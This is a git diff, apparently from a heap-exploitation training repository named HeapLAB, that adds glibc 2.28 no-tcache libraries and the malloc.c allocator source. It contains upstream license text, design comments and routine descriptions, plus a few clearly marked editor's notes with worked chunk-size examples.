+	  if (sizes[NFASTBINS - 1 + i].count == 0)
+	    sizes[NFASTBINS - 1 + i].from = 0;
+	  nblocks += sizes[NFASTBINS - 1 + i].count;
+	  avail += sizes[NFASTBINS - 1 + i].total;
+	}
+
+      size_t heap_size = 0;
+      size_t heap_mprotect_size = 0;
+      size_t heap_count = 0;
+      if (ar_ptr != &main_arena)
+	{
+	  /* Iterate over the arena heaps from back to front.  */
+	  heap_info *heap = heap_for_ptr (top (ar_ptr));
+	  do
+	    {
+	      heap_size += heap->size;
+	      heap_mprotect_size += heap->mprotect_size;
+	      heap = heap->prev;
+	      ++heap_count;
+	    }
+	  while (heap != NULL);
+	}
+
+      __libc_lock_unlock (ar_ptr->mutex);
+
+      total_nfastblocks += nfastblocks;
+      total_fastavail += fastavail;
+
+      total_nblocks += nblocks;
+      total_avail += avail;
+
+      for (size_t i = 0; i < nsizes; ++i)
+	if (sizes[i].count != 0 && i != NFASTBINS)
+	  fprintf (fp, "							      \
+  <size from=\"%zu\" to=\"%zu\" total=\"%zu\" count=\"%zu\"/>\n",
+		   sizes[i].from, sizes[i].to, sizes[i].total, sizes[i].count);
+
+      if (sizes[NFASTBINS].count != 0)
+	fprintf (fp, "\
+  <unsorted from=\"%zu\" to=\"%zu\" total=\"%zu\" count=\"%zu\"/>\n",
+		 sizes[NFASTBINS].from, sizes[NFASTBINS].to,
+		 sizes[NFASTBINS].total, sizes[NFASTBINS].count);
+
+      total_system += ar_ptr->system_mem;
+      total_max_system += ar_ptr->max_system_mem;
+
+      fprintf (fp,
+	       "</sizes>\n<total type=\"fast\" count=\"%zu\" size=\"%zu\"/>\n"
+	       "<total type=\"rest\" count=\"%zu\" size=\"%zu\"/>\n"
+	       "<system type=\"current\" size=\"%zu\"/>\n"
+	       "<system type=\"max\" size=\"%zu\"/>\n",
+	       nfastblocks, fastavail, nblocks, avail,
+	       ar_ptr->system_mem, ar_ptr->max_system_mem);
+
+      if (ar_ptr != &main_arena)
+	{
+	  fprintf (fp,
+		   "<aspace type=\"total\" size=\"%zu\"/>\n"
+		   "<aspace type=\"mprotect\" size=\"%zu\"/>\n"
+		   "<aspace type=\"subheaps\" size=\"%zu\"/>\n",
+		   heap_size, heap_mprotect_size, heap_count);
+	  total_aspace += heap_size;
+	  total_aspace_mprotect += heap_mprotect_size;
+	}
+      else
+	{
+	  fprintf (fp,
+		   "<aspace type=\"total\" size=\"%zu\"/>\n"
+		   "<aspace type=\"mprotect\" size=\"%zu\"/>\n",
+		   ar_ptr->system_mem, ar_ptr->system_mem);
+	  total_aspace += ar_ptr->system_mem;
+	  total_aspace_mprotect += ar_ptr->system_mem;
+	}
+
+      fputs ("</heap>\n", fp);
+      ar_ptr = ar_ptr->next;
+    }
+  while (ar_ptr != &main_arena);
+
+  fprintf (fp,
+	   "<total type=\"fast\" count=\"%zu\" size=\"%zu\"/>\n"
+	   "<total type=\"rest\" count=\"%zu\" size=\"%zu\"/>\n"
+	   "<total type=\"mmap\" count=\"%d\" size=\"%zu\"/>\n"
+	   "<system type=\"current\" size=\"%zu\"/>\n"
+	   "<system type=\"max\" size=\"%zu\"/>\n"
+	   "<aspace type=\"total\" size=\"%zu\"/>\n"
+	   "<aspace type=\"mprotect\" size=\"%zu\"/>\n"
+	   "</malloc>\n",
+	   total_nfastblocks, total_fastavail, total_nblocks, total_avail,
+	   mp_.n_mmaps, mp_.mmapped_mem,
+	   total_system, total_max_system,
+	   total_aspace, total_aspace_mprotect);
+
+  return 0;
+}
+weak_alias (__malloc_info, malloc_info)
+
+
+strong_alias (__libc_calloc, __calloc) weak_alias (__libc_calloc, calloc)
+strong_alias (__libc_free, __free) strong_alias (__libc_free, free)
+strong_alias (__libc_malloc, __malloc) strong_alias (__libc_malloc, malloc)
+strong_alias (__libc_memalign, __memalign)
+weak_alias (__libc_memalign, memalign)
+strong_alias (__libc_realloc, __realloc) strong_alias (__libc_realloc, realloc)
+strong_alias (__libc_valloc, __valloc) weak_alias (__libc_valloc, valloc)
+strong_alias (__libc_pvalloc, __pvalloc) weak_alias (__libc_pvalloc, pvalloc)
+strong_alias (__libc_mallinfo, __mallinfo)
+weak_alias (__libc_mallinfo, mallinfo)
+strong_alias (__libc_mallopt, __mallopt) weak_alias (__libc_mallopt, mallopt)
+
+weak_alias (__malloc_stats, malloc_stats)
+weak_alias (__malloc_usable_size, malloc_usable_size)
+weak_alias (__malloc_trim, malloc_trim)
+
+#if SHLIB_COMPAT (libc, GLIBC_2_0, GLIBC_2_26)
+compat_symbol (libc, __libc_free, cfree, GLIBC_2_0);
+#endif
+
+/* ------------------------------------------------------------
+   History:
+
+   [see ftp://g.oswego.edu/pub/misc/malloc.c for the history of dlmalloc]
+
+ */
+/*
+ * Local variables:
+ * c-basic-offset: 2
+ * End:
+ */
diff --git a/HeapLAB/.glibc/glibc_2.28_no-tcache/ld-2.28.so b/HeapLAB/.glibc/glibc_2.28_no-tcache/ld-2.28.so
new file mode 100755
index 0000000..ef53b5e
Binary files /dev/null and b/HeapLAB/.glibc/glibc_2.28_no-tcache/ld-2.28.so differ
diff --git a/HeapLAB/.glibc/glibc_2.28_no-tcache/ld.so.2 b/HeapLAB/.glibc/glibc_2.28_no-tcache/ld.so.2
new file mode 120000
index 0000000..695c5dc
--- /dev/null
+++ b/HeapLAB/.glibc/glibc_2.28_no-tcache/ld.so.2
@@ -0,0 +1 @@
+ld-2.28.so
\ No newline at end of file
diff --git a/HeapLAB/.glibc/glibc_2.28_no-tcache/libc-2.28.so b/HeapLAB/.glibc/glibc_2.28_no-tcache/libc-2.28.so
new file mode 100755
index 0000000..e6d084e
Binary files /dev/null and b/HeapLAB/.glibc/glibc_2.28_no-tcache/libc-2.28.so differ
diff --git a/HeapLAB/.glibc/glibc_2.28_no-tcache/libc.so.6 b/HeapLAB/.glibc/glibc_2.28_no-tcache/libc.so.6
new file mode 120000
index 0000000..695ffa0
--- /dev/null
+++ b/HeapLAB/.glibc/glibc_2.28_no-tcache/libc.so.6
@@ -0,0 +1 @@
+libc-2.28.so
\ No newline at end of file
diff --git a/HeapLAB/.glibc/glibc_2.28_no-tcache/malloc/malloc.c b/HeapLAB/.glibc/glibc_2.28_no-tcache/malloc/malloc.c
new file mode 100644
index 0000000..e247c77
--- /dev/null
+++ b/HeapLAB/.glibc/glibc_2.28_no-tcache/malloc/malloc.c
@@ -0,0 +1,5593 @@
+/* Malloc implementation for multiple threads without lock contention.
+   Copyright (C) 1996-2018 Free Software Foundation, Inc.
+   This file is part of the GNU C Library.
+   Contributed by Wolfram Gloger <wg@malloc.de>
+   and Doug Lea <dl@cs.oswego.edu>, 2001.
+
+   The GNU C Library is free software; you can redistribute it and/or
+   modify it under the terms of the GNU Lesser General Public License as
+   published by the Free Software Foundation; either version 2.1 of the
+   License, or (at your option) any later version.
+
+   The GNU C Library is distributed in the hope that it will be useful,
+   but WITHOUT ANY WARRANTY; without even the implied warranty of
+   MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
+   Lesser General Public License for more details.
+
+   You should have received a copy of the GNU Lesser General Public
+   License along with the GNU C Library; see the file COPYING.LIB.  If
+   not, see <http://www.gnu.org/licenses/>.  */
+
+/*
+  This is a version (aka ptmalloc2) of malloc/free/realloc written by
+  Doug Lea and adapted to multiple threads/arenas by Wolfram Gloger.
+
+  There have been substantial changes made after the integration into
+  glibc in all parts of the code.  Do not look for much commonality
+  with the ptmalloc2 version.
+
+* Version ptmalloc2-20011215
+  based on:
+  VERSION 2.7.0 Sun Mar 11 14:14:06 2001  Doug Lea  (dl at gee)
+
+* Quickstart
+
+  In order to compile this implementation, a Makefile is provided with
+  the ptmalloc2 distribution, which has pre-defined targets for some
+  popular systems (e.g. "make posix" for Posix threads).  All that is
+  typically required with regard to compiler flags is the selection of
+  the thread package via defining one out of USE_PTHREADS, USE_THR or
+  USE_SPROC.  Check the thread-m.h file for what effects this has.
+  Many/most systems will additionally require USE_TSD_DATA_HACK to be
+  defined, so this is the default for "make posix".
+
+* Why use this malloc?
+
+  This is not the fastest, most space-conserving, most portable, or
+  most tunable malloc ever written. However it is among the fastest
+  while also being among the most space-conserving, portable and tunable.
+  Consistent balance across these factors results in a good general-purpose
+  allocator for malloc-intensive programs.
+
+  The main properties of the algorithms are:
+  * For large (>= 512 bytes) requests, it is a pure best-fit allocator,
+    with ties normally decided via FIFO (i.e. least recently used).
+  * For small (<= 64 bytes by default) requests, it is a caching
+    allocator that maintains pools of quickly recycled chunks.
+  * In between, and for combinations of large and small requests, it does
+    the best it can trying to meet both goals at once.
+  * For very large requests (>= 128KB by default), it relies on system
+    memory mapping facilities, if supported.
+
+  For a longer but slightly out of date high-level description, see
+     http://gee.cs.oswego.edu/dl/html/malloc.html
+
+  You may already by default be using a C library containing a malloc
+  that is based on some version of this malloc (for example in
+  linux). You might still want to use the one in this file in order to
+  customize settings or to avoid overheads associated with library
+  versions.
+
+* Contents, described in more detail in "description of public routines" below.
+
+  Standard (ANSI/SVID/...)  functions:
+    malloc(size_t n);
+    calloc(size_t n_elements, size_t element_size);
+    free(void* p);
+    realloc(void* p, size_t n);
+    memalign(size_t alignment, size_t n);
+    valloc(size_t n);
+    mallinfo()
+    mallopt(int parameter_number, int parameter_value)
+
+  Additional functions:
+    independent_calloc(size_t n_elements, size_t size, void* chunks[]);
+    independent_comalloc(size_t n_elements, size_t sizes[], void* chunks[]);
+    pvalloc(size_t n);
+    malloc_trim(size_t pad);
+    malloc_usable_size(void* p);
+    malloc_stats();
+
+* Vital statistics:
+
+  Supported pointer representation:       4 or 8 bytes
+  Supported size_t  representation:       4 or 8 bytes
+       Note that size_t is allowed to be 4 bytes even if pointers are 8.
+       You can adjust this by defining INTERNAL_SIZE_T
+
+  Alignment:                              2 * sizeof(size_t) (default)
+       (i.e., 8 byte alignment with 4byte size_t). This suffices for
+       nearly all current machines and C compilers. However, you can
+       define MALLOC_ALIGNMENT to be wider than this if necessary.
+
+  Minimum overhead per allocated chunk:   4 or 8 bytes
+       Each malloced chunk has a hidden word of overhead holding size
+       and status information.
+
+  Minimum allocated size: 4-byte ptrs:  16 bytes    (including 4 overhead)
+                          8-byte ptrs:  24/32 bytes (including 4/8 overhead)
+
+       When a chunk is freed, 12 (for 4byte ptrs) or 20 (for 8 byte
+       ptrs but 4 byte size) or 24 (for 8/8) additional bytes are
+       needed; 4 (8) for a trailing size field and 8 (16) bytes for
+       free list pointers. Thus, the minimum allocatable size is
+       16/24/32 bytes.
+
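+       [Editor's note: worked example, not part of upstream glibc.]
+       On a typical 64-bit build (8-byte size_t, 16-byte alignment) a
+       request is padded by one size word and rounded up, with a floor
+       of the minimum chunk size:
+
+         malloc(0)   ->  32-byte chunk   (minimum)
+         malloc(24)  ->  32-byte chunk   (24 + 8 = 32, already aligned)
+         malloc(25)  ->  48-byte chunk   (25 + 8 = 33, rounded up to 48)
+
+       so the usable space handed back is 24 and 40 bytes respectively.
+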
+       Even a request for zero bytes (i.e., malloc(0)) returns a
+       pointer to something of the minimum allocatable size.
+
+       The maximum overhead wastage (i.e., number of extra bytes
+       allocated than were requested in malloc) is less than or equal
+       to the minimum size, except for requests >= mmap_threshold that
+       are serviced via mmap(), where the worst case wastage is 2 *
+       sizeof(size_t) bytes plus the remainder from a system page (the
+       minimal mmap unit); typically 4096 or 8192 bytes.
+
+  Maximum allocated size:  4-byte size_t: 2^32 minus about two pages
+			   8-byte size_t: 2^64 minus about two pages
+
+       It is assumed that (possibly signed) size_t values suffice to
+       represent chunk sizes. `Possibly signed' is due to the fact
+       that `size_t' may be defined on a system as either a signed or
+       an unsigned type. The ISO C standard says that it must be
+       unsigned, but a few systems are known not to adhere to this.
+       Additionally, even when size_t is unsigned, sbrk (which is by
+       default used to obtain memory from system) accepts signed
+       arguments, and may not be able to handle size_t-wide arguments
+       with negative sign bit.  Generally, values that would
+       appear as negative after accounting for overhead and alignment
+       are supported only via mmap(), which does not have this
+       limitation.
+
+       Requests for sizes outside the allowed range will perform an optional
+       failure action and then return null. (Requests may also
+       fail because a system is out of memory.)
+
+  Thread-safety: thread-safe
+
+  Compliance: I believe it is compliant with the 1997 Single Unix Specification
+       Also SVID/XPG, ANSI C, and probably others as well.
+
+* Synopsis of compile-time options:
+
+    People have reported using previous versions of this malloc on all
+    versions of Unix, sometimes by tweaking some of the defines
+    below. It has been tested most extensively on Solaris and Linux.
+    People also report using it in stand-alone embedded systems.
+
+    The implementation is in straight, hand-tuned ANSI C.  It is not
+    at all modular. (Sorry!)  It uses a lot of macros.  To be at all
+    usable, this code should be compiled using an optimizing compiler
+    (for example gcc -O3) that can simplify expressions and control
+    paths. (FAQ: some macros import variables as arguments rather than
+    declare locals because people reported that some debuggers
+    otherwise get confused.)
+
+    OPTION                     DEFAULT VALUE
+
+    Compilation Environment options:
+
+    HAVE_MREMAP                0
+
+    Changing default word sizes:
+
+    INTERNAL_SIZE_T            size_t
+
+    Configuration and functionality options:
+
+    USE_PUBLIC_MALLOC_WRAPPERS NOT defined
+    USE_MALLOC_LOCK            NOT defined
+    MALLOC_DEBUG               NOT defined
+    REALLOC_ZERO_BYTES_FREES   1
+    TRIM_FASTBINS              0
+
+    Options for customizing MORECORE:
+
+    MORECORE                   sbrk
+    MORECORE_FAILURE           -1
+    MORECORE_CONTIGUOUS        1
+    MORECORE_CANNOT_TRIM       NOT defined
+    MORECORE_CLEARS            1
+    MMAP_AS_MORECORE_SIZE      (1024 * 1024)
+
+    Tuning options that are also dynamically changeable via mallopt:
+
+    DEFAULT_MXFAST             64 (for 32bit), 128 (for 64bit)
+    DEFAULT_TRIM_THRESHOLD     128 * 1024
+    DEFAULT_TOP_PAD            0
+    DEFAULT_MMAP_THRESHOLD     128 * 1024
+    DEFAULT_MMAP_MAX           65536
+
+    There are several other #defined constants and macros that you
+    probably don't want to touch unless you are extending or adapting malloc.  */
+
+/*
+  void* is the pointer type that malloc should say it returns
+*/
+
+#ifndef void
+#define void      void
+#endif /*void*/
+
+#include <stddef.h>   /* for size_t */
+#include <stdlib.h>   /* for getenv(), abort() */
+#include <unistd.h>   /* for __libc_enable_secure */
+
+#include <atomic.h>
+#include <_itoa.h>
+#include <bits/wordsize.h>
+#include <sys/sysinfo.h>
+
+#include <ldsodefs.h>
+
+#include <unistd.h>
+#include <stdio.h>    /* needed for malloc_stats */
+#include <errno.h>
+#include <assert.h>
+
+#include <shlib-compat.h>
+
+/* For uintptr_t.  */
+#include <stdint.h>
+
+/* For va_arg, va_start, va_end.  */
+#include <stdarg.h>
+
+/* For MIN, MAX, powerof2.  */
+#include <sys/param.h>
+
+/* For ALIGN_UP et. al.  */
+#include <libc-pointer-arith.h>
+
+/* For DIAG_PUSH/POP_NEEDS_COMMENT et al.  */
+#include <libc-diag.h>
+
+#include <malloc/malloc-internal.h>
+
+/* For SINGLE_THREAD_P.  */
+#include <sysdep-cancel.h>
+
+/*
+  Debugging:
+
+  Because freed chunks may be overwritten with bookkeeping fields, this
+  malloc will often die when freed memory is overwritten by user
+  programs.  This can be very effective (albeit in an annoying way)
+  in helping track down dangling pointers.
+
+  If you compile with -DMALLOC_DEBUG, a number of assertion checks are
+  enabled that will catch more memory errors. You probably won't be
+  able to make much sense of the actual assertion errors, but they
+  should help you locate incorrectly overwritten memory.  The checking
+  is fairly extensive, and will slow down execution
+  noticeably. Calling malloc_stats or mallinfo with MALLOC_DEBUG set
+  will attempt to check every non-mmapped allocated and free chunk in
+  the course of computing the summaries. (By nature, mmapped regions
+  cannot be checked very much automatically.)
+
+  Setting MALLOC_DEBUG may also be helpful if you are trying to modify
+  this code. The assertions in the check routines spell out in more
+  detail the assumptions and invariants underlying the algorithms.
+
+  Setting MALLOC_DEBUG does NOT provide an automated mechanism for
+  checking that all accesses to malloced memory stay within their
+  bounds. However, there are several add-ons and adaptations of this
+  or other mallocs available that do this.
+*/
+
+#ifndef MALLOC_DEBUG
+#define MALLOC_DEBUG 0
+#endif
+
+#ifndef NDEBUG
+# define __assert_fail(assertion, file, line, function)			\
+	 __malloc_assert(assertion, file, line, function)
+
+extern const char *__progname;
+
+static void
+__malloc_assert (const char *assertion, const char *file, unsigned int line,
+		 const char *function)
+{
+  (void) __fxprintf (NULL, "%s%s%s:%u: %s%sAssertion `%s' failed.\n",
+		     __progname, __progname[0] ? ": " : "",
+		     file, line,
+		     function ? function : "", function ? ": " : "",
+		     assertion);
+  fflush (stderr);
+  abort ();
+}
+#endif
+
+#if USE_TCACHE
+/* We want 64 entries.  This is an arbitrary limit, which tunables can reduce.  */
+# define TCACHE_MAX_BINS		64
+# define MAX_TCACHE_SIZE	tidx2usize (TCACHE_MAX_BINS-1)
+
+/* Only used to pre-fill the tunables.  */
+# define tidx2usize(idx)	(((size_t) idx) * MALLOC_ALIGNMENT + MINSIZE - SIZE_SZ)
+
+/* When "x" is from chunksize().  */
+# define csize2tidx(x) (((x) - MINSIZE + MALLOC_ALIGNMENT - 1) / MALLOC_ALIGNMENT)
+/* When "x" is a user-provided size.  */
+# define usize2tidx(x) csize2tidx (request2size (x))
+
+/* With rounding and alignment, the bins are...
+   idx 0   bytes 0..24 (64-bit) or 0..12 (32-bit)
+   idx 1   bytes 25..40 or 13..20
+   idx 2   bytes 41..56 or 21..28
+   etc.  */
+
+/* This is another arbitrary limit, which tunables can change.  Each
+   tcache bin will hold at most this number of chunks.  */
+# define TCACHE_FILL_COUNT 7
+#endif
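+
+/* [Editor's note: worked example, not part of upstream glibc.]
+   With 16-byte MALLOC_ALIGNMENT and a 32-byte MINSIZE (a typical 64-bit
+   build), the index macros above map chunk sizes to tcache bins as:
+
+     csize2tidx (0x20) == (0x20 - 0x20 + 0xf) / 0x10 == 0
+     csize2tidx (0x30) == (0x30 - 0x20 + 0xf) / 0x10 == 1
+     csize2tidx (0x40) == 2,  ...  up to idx 63 for 0x410-byte chunks
+
+   This copy ships in the no-tcache build directory, so the block above
+   is presumably compiled out of the accompanying libc.  */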
+
+
+/*
+  REALLOC_ZERO_BYTES_FREES should be set if a call to
+  realloc with zero bytes should be the same as a call to free.
+  This is required by the C standard. Otherwise, since this malloc
+  returns a unique pointer for malloc(0), so does realloc(p, 0).
+*/
+
+#ifndef REALLOC_ZERO_BYTES_FREES
+#define REALLOC_ZERO_BYTES_FREES 1
+#endif
+
+/*
+  TRIM_FASTBINS controls whether free() of a very small chunk can
+  immediately lead to trimming. Setting to true (1) can reduce memory
+  footprint, but will almost always slow down programs that use a lot
+  of small chunks.
+
+  Define this only if you are willing to give up some speed to more
+  aggressively reduce system-level memory footprint when releasing
+  memory in programs that use many small chunks.  You can get
+  essentially the same effect by setting MXFAST to 0, but this can
+  lead to even greater slowdowns in programs using many small chunks.
+  TRIM_FASTBINS is an in-between compile-time option, that disables
+  only those chunks bordering topmost memory from being placed in
+  fastbins.
+*/
+
+#ifndef TRIM_FASTBINS
+#define TRIM_FASTBINS  0
+#endif
+
+
+/* Definition for getting more memory from the OS.  */
+#define MORECORE         (*__morecore)
+#define MORECORE_FAILURE 0
+void * __default_morecore (ptrdiff_t);
+void *(*__morecore)(ptrdiff_t) = __default_morecore;
+
+
+#include <string.h>
+
+/*
+  MORECORE-related declarations. By default, rely on sbrk
+*/
+
+
+/*
+  MORECORE is the name of the routine to call to obtain more memory
+  from the system.  See below for general guidance on writing
+  alternative MORECORE functions, as well as a version for WIN32 and a
+  sample version for pre-OSX macos.
+*/
+
+#ifndef MORECORE
+#define MORECORE sbrk
+#endif
+
+/*
+  MORECORE_FAILURE is the value returned upon failure of MORECORE
+  as well as mmap. Since it cannot be an otherwise valid memory address,
+  and must reflect values of standard sys calls, you probably ought not
+  try to redefine it.
+*/
+
+#ifndef MORECORE_FAILURE
+#define MORECORE_FAILURE (-1)
+#endif
+
+/*
+  If MORECORE_CONTIGUOUS is true, take advantage of fact that
+  consecutive calls to MORECORE with positive arguments always return
+  contiguous increasing addresses.  This is true of unix sbrk.  Even
+  if not defined, when regions happen to be contiguous, malloc will
+  permit allocations spanning regions obtained from different
+  calls. But defining this when applicable enables some stronger
+  consistency checks and space efficiencies.
+*/
+
+#ifndef MORECORE_CONTIGUOUS
+#define MORECORE_CONTIGUOUS 1
+#endif
+
+/*
+  Define MORECORE_CANNOT_TRIM if your version of MORECORE
+  cannot release space back to the system when given negative
+  arguments. This is generally necessary only if you are using
+  a hand-crafted MORECORE function that cannot handle negative arguments.
+*/
+
+/* #define MORECORE_CANNOT_TRIM */
+
+/*  MORECORE_CLEARS           (default 1)
+     The degree to which the routine mapped to MORECORE zeroes out
+     memory: never (0), only for newly allocated space (1) or always
+     (2).  The distinction between (1) and (2) is necessary because on
+     some systems, if the application first decrements and then
+     increments the break value, the contents of the reallocated space
+     are unspecified.
+ */
+
+#ifndef MORECORE_CLEARS
+# define MORECORE_CLEARS 1
+#endif
+
+
+/*
+   MMAP_AS_MORECORE_SIZE is the minimum mmap size argument to use if
+   sbrk fails, and mmap is used as a backup.  The value must be a
+   multiple of page size.  This backup strategy generally applies only
+   when systems have "holes" in address space, so sbrk cannot perform
+   contiguous expansion, but there is still space available on system.
+   On systems for which this is known to be useful (i.e. most linux
+   kernels), this occurs only when programs allocate huge amounts of
+   memory.  Between this, and the fact that mmap regions tend to be
+   limited, the size should be large, to avoid too many mmap calls and
+   thus avoid running out of kernel resources.  */
+
+#ifndef MMAP_AS_MORECORE_SIZE
+#define MMAP_AS_MORECORE_SIZE (1024 * 1024)
+#endif
+
+/*
+  Define HAVE_MREMAP to make realloc() use mremap() to re-allocate
+  large blocks.
+*/
+
+#ifndef HAVE_MREMAP
+#define HAVE_MREMAP 0
+#endif
+
+/* We may need to support __malloc_initialize_hook for backwards
+   compatibility.  */
+
+#if SHLIB_COMPAT (libc, GLIBC_2_0, GLIBC_2_24)
+# define HAVE_MALLOC_INIT_HOOK 1
+#else
+# define HAVE_MALLOC_INIT_HOOK 0
+#endif
+
+
+/*
+  This version of malloc supports the standard SVID/XPG mallinfo
+  routine that returns a struct containing usage properties and
+  statistics. It should work on any SVID/XPG compliant system that has
+  a /usr/include/malloc.h defining struct mallinfo. (If you'd like to
+  install such a thing yourself, cut out the preliminary declarations
+  as described above and below and save them in a malloc.h file. But
+  there's no compelling reason to bother to do this.)
+
+  The main declaration needed is the mallinfo struct that is returned
+  (by-copy) by mallinfo().  The SVID/XPG mallinfo struct contains a
+  bunch of fields that are not even meaningful in this version of
+  malloc.  These fields are instead filled by mallinfo() with
+  other numbers that might be of interest.
+*/
+
+
+/* ---------- description of public routines ------------ */
+
+/*
+  malloc(size_t n)
+  Returns a pointer to a newly allocated chunk of at least n bytes, or null
+  if no space is available. Additionally, on failure, errno is
+  set to ENOMEM on ANSI C systems.
+
+  If n is zero, malloc returns a minimum-sized chunk. (The minimum
+  size is 16 bytes on most 32bit systems, and 24 or 32 bytes on 64bit
+  systems.)  On most systems, size_t is an unsigned type, so calls
+  with negative arguments are interpreted as requests for huge amounts
+  of space, which will often fail. The maximum supported value of n
+  differs across systems, but is in all cases less than the maximum
+  representable value of a size_t.
+*/
+void*  __libc_malloc(size_t);
+libc_hidden_proto (__libc_malloc)
+
+/*
+  free(void* p)
+  Releases the chunk of memory pointed to by p, that had been previously
+  allocated using malloc or a related routine such as realloc.
+  It has no effect if p is null. It can have arbitrary (i.e., bad!)
+  effects if p has already been freed.
+
+  Unless disabled (using mallopt), freeing very large spaces will
+  when possible, automatically trigger operations that give
+  back unused memory to the system, thus reducing program footprint.
+*/
+void     __libc_free(void*);
+libc_hidden_proto (__libc_free)
+
+/*
+  calloc(size_t n_elements, size_t element_size);
+  Returns a pointer to n_elements * element_size bytes, with all locations
+  set to zero.
+*/
+void*  __libc_calloc(size_t, size_t);
+
+/*
+  realloc(void* p, size_t n)
+  Returns a pointer to a chunk of size n that contains the same data
+  as does chunk p up to the minimum of (n, p's size) bytes, or null
+  if no space is available.
+
+  The returned pointer may or may not be the same as p. The algorithm
+  prefers extending p when possible, otherwise it employs the
+  equivalent of a malloc-copy-free sequence.
+
+  If p is null, realloc is equivalent to malloc.
+
+  If space is not available, realloc returns null, errno is set (if on
+  ANSI) and p is NOT freed.
+
+  If n is for fewer bytes than already held by p, the newly unused
+  space is lopped off and freed if possible.  Unless the #define
+  REALLOC_ZERO_BYTES_FREES is set, realloc with a size argument of
+  zero (re)allocates a minimum-sized chunk.
+
+  Large chunks that were internally obtained via mmap will always be
+  grown using malloc-copy-free sequences unless the system supports
+  MREMAP (currently only linux).
+
+  The old unix realloc convention of allowing the last-free'd chunk
+  to be used as an argument to realloc is not supported.
+*/
+void*  __libc_realloc(void*, size_t);
+libc_hidden_proto (__libc_realloc)
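+
+/*
+  Editorial note (not upstream text): because a failed realloc leaves
+  the original block intact, a caller should keep the old pointer until
+  the new one is known to be valid, e.g.:
+
+  char *tmp = realloc(buf, new_size);
+  if (tmp != NULL)
+    buf = tmp;
+  else
+    handle_oom();
+
+  buf, new_size and handle_oom are illustrative names; on the failure
+  path buf still points to the original, still-allocated block.
+*/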
+
+/*
+  memalign(size_t alignment, size_t n);
+  Returns a pointer to a newly allocated chunk of n bytes, aligned
+  in accord with the alignment argument.
+
+  The alignment argument should be a power of two. If the argument is
+  not a power of two, the nearest greater power is used.
+  8-byte alignment is guaranteed by normal malloc calls, so don't
+  bother calling memalign with an argument of 8 or less.
+
+  Overreliance on memalign is a sure way to fragment space.
+*/
+void*  __libc_memalign(size_t, size_t);
+libc_hidden_proto (__libc_memalign)
+
+/*
+  valloc(size_t n);
+  Equivalent to memalign(pagesize, n), where pagesize is the page
+  size of the system. If the pagesize is unknown, 4096 is used.
+*/
+void*  __libc_valloc(size_t);
+
+
+
+/*
+  mallopt(int parameter_number, int parameter_value)
+  Sets tunable parameters.  The format is to provide a
+  (parameter-number, parameter-value) pair.  mallopt then sets the
+  corresponding parameter to the argument value if it can (i.e., so
+  long as the value is meaningful), and returns 1 if successful else
+  0.  SVID/XPG/ANSI defines four standard param numbers for mallopt,
+  normally defined in malloc.h.  Only one of these (M_MXFAST) is used
+  in this malloc. The others (M_NLBLKS, M_GRAIN, M_KEEP) don't apply,
+  so setting them has no effect. But this malloc also supports four
+  other options in mallopt. See below for details.  Briefly, supported
+  parameters are as follows (listed defaults are for "typical"
+  configurations).
+
+  Symbol            param #   default    allowed param values
+  M_MXFAST          1         64         0-80  (0 disables fastbins)
+  M_TRIM_THRESHOLD -1         128*1024   any   (-1U disables trimming)
+  M_TOP_PAD        -2         0          any
+  M_MMAP_THRESHOLD -3         128*1024   any   (or 0 if no MMAP support)
+  M_MMAP_MAX       -4         65536      any   (0 disables use of mmap)
+*/
+int      __libc_mallopt(int, int);
+libc_hidden_proto (__libc_mallopt)
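+
+/*
+  Editorial note (not upstream text): a typical mallopt call sets one
+  parameter and checks the return value, for example disabling
+  fastbins entirely:
+
+  if (mallopt(M_MXFAST, 0) != 1)
+    handle_error();
+
+  handle_error is a placeholder; mallopt returns 1 on success and 0 if
+  the value was rejected.
+*/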
+
+
+/*
+  mallinfo()
+  Returns (by copy) a struct containing various summary statistics:
+
+  arena:     current total non-mmapped bytes allocated from system
+  ordblks:   the number of free chunks
+  smblks:    the number of fastbin blocks (i.e., small chunks that
+	       have been freed but not yet reused or consolidated)
+  hblks:     current number of mmapped regions
+  hblkhd:    total bytes held in mmapped regions
+  usmblks:   always 0
+  fsmblks:   total bytes held in fastbin blocks
+  uordblks:  current total allocated space (normal or mmapped)
+  fordblks:  total free space
+  keepcost:  the maximum number of bytes that could ideally be released
+	       back to system via malloc_trim. ("ideally" means that
+	       it ignores page restrictions etc.)
+
+  Because these fields are ints, but internal bookkeeping may
+  be kept as longs, the reported values may wrap around zero and
+  thus be inaccurate.
+*/
+struct mallinfo __libc_mallinfo(void);
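+
+/*
+  Editorial note (not upstream text): a caller-side sketch reading a
+  few of the fields described above:
+
+  struct mallinfo mi = mallinfo();
+  printf("non-mmapped arena bytes: %d\n", mi.arena);
+  printf("free chunks:             %d\n", mi.ordblks);
+  printf("total free bytes:        %d\n", mi.fordblks);
+
+  The fields are plain ints, so values on large heaps may wrap as
+  noted above.
+*/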
+
+
+/*
+  pvalloc(size_t n);
+  Equivalent to valloc(minimum-page-that-holds(n)), that is,
+  round up n to nearest pagesize.
+ */
+void*  __libc_pvalloc(size_t);
+
+/*
+  malloc_trim(size_t pad);
+
+  If possible, gives memory back to the system (via negative
+  arguments to sbrk) if there is unused memory at the `high' end of
+  the malloc pool. You can call this after freeing large blocks of
+  memory to potentially reduce the system-level memory requirements
+  of a program. However, it cannot guarantee to reduce memory. Under
+  some allocation patterns, some large free blocks of memory will be
+  locked between two used chunks, so they cannot be given back to
+  the system.
+
+  The `pad' argument to malloc_trim represents the amount of free
+  trailing space to leave untrimmed. If this argument is zero,
+  only the minimum amount of memory to maintain internal data
+  structures will be left (one page or less). Non-zero arguments
+  can be supplied to maintain enough trailing space to service
+  future expected allocations without having to re-obtain memory
+  from the system.
+
+  Malloc_trim returns 1 if it actually released any memory, else 0.
+  On systems that do not support "negative sbrks", it will always
+  return 0.
+*/
+int      __malloc_trim(size_t);
+
+/*
+  malloc_usable_size(void* p);
+
+  Returns the number of bytes you can actually use in
+  an allocated chunk, which may be more than you requested (although
+  often not) due to alignment and minimum size constraints.
+  You can use this many bytes without worrying about
+  overwriting other allocated objects. This is not a particularly great
+  programming practice. malloc_usable_size can be more useful in
+  debugging and assertions, for example:
+
+  p = malloc(n);
+  assert(malloc_usable_size(p) >= 256);
+
+*/
+size_t   __malloc_usable_size(void*);
+
+/*
+  malloc_stats();
+  Prints on stderr the amount of space obtained from the system (both
+  via sbrk and mmap), the maximum amount (which may be more than
+  current if malloc_trim and/or munmap got called), and the current
+  number of bytes allocated via malloc (or realloc, etc) but not yet
